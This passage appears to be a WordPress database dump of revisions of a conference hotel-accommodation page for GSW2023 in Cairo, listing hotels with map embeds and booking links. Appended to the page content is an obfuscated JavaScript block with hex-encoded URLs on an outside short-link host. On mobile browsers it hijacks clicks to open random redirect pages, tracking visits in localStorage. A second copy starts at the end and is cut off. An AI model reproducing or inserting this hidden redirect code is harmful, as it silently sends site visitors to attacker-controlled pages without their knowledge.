src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: right;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][/vc_column][vc_column width=\"1/2\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: right;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-07-18 23:02:34','2023-07-18 23:02:34','',2685,'https://gsw2023.com/?p=5021',0,'revision','',0),
(5022,1,'2023-07-18 23:04:14','2023-07-18 23:04:14','<p>[vc_row][vc_column][dt_banner image_id=\"2683\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">INTERCONTINENTAL CAIRO SEMIRAMIS</span></h2>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe></p>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><a style=\"color: #ffff00;\" href=\"https://www.ihg.com/intercontinental/hotels/us/en/cairo/croha/hoteldetail?fromRedirect=true&amp;qSrt=sAV&amp;qIta=99801505&amp;icdv=99801505&amp;qSlH=CROHA&amp;qGrpCd=DY8&amp;setPMCookies=true&amp;qSHBrC=IC&amp;qDest=Corniche+El+Nil%252C+Cairo%252C+EG&amp;srb_u=1\" target=\"_blank\" rel=\"noopener\">BOOK NOW</a></span></h5>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_banner image_id=\"4788\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Grand Nile Tower Hotel</span></h2>\n<ul>\n<li><span style=\"color: #ffffff;\"><a style=\"color: #ffffff;\" href=\"https://www.grandniletower.com/\">https://www.grandniletower.com/</a></span></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3454.091887744032!2d31.22467591511475!3d30.03422158188607!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x14584090695d6421%3A0x201285387107863a!2sGrand%20Nile%20Tower!5e0!3m2!1sen!2ssa!4v1689721277379!5m2!1sen!2ssa\" width=\"200\" height=\"200\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p>\n<h5 style=\"text-align: center;\"><a href=\"https://gsw2023.com/index.php/grand-nile-tower-hotel/\"><span style=\"font-size: 14pt; color: #ffff00;\">BOOK NOW</span></a></h5>\n<p>[/dt_banner][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: right;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: right;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][/vc_column][vc_column width=\"1/2\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: right;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 